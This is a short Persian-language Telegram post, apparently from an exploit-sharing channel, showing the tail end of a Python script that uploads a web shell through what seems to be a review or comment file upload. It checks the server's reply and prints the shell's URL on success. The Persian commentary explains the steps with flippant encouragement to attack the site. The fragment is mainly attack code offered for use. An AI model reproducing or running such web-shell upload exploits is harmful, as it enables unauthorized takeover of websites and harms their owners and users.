response = requests.post(uri, files=files, data=data )
✅تو خط بالایی داره دیتا هارو میفرسته
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
✅بعده ارسال query چک میکنه که فایل شله هست اونجا یا نه اگه بود میزنه حله دهنشو سرویس کن نبود میگه بعدی... و خارج میشه
file_name = path.basename(file_path)
if("ok" in response.text):
print("Shell Uploaded!")
print("Shell URL on your Review/Comment");
else:
print("Shell Upload Failed")
sys.exit(1)
main();
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
✅خب این بود کل قضیه 😐🙌 بابا خیلی جدی نگیرید اینارو
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
IR0Day.Today Boy's
@LearnExploit
@TechArmy
Telegram
AttachLearnExploit
👍2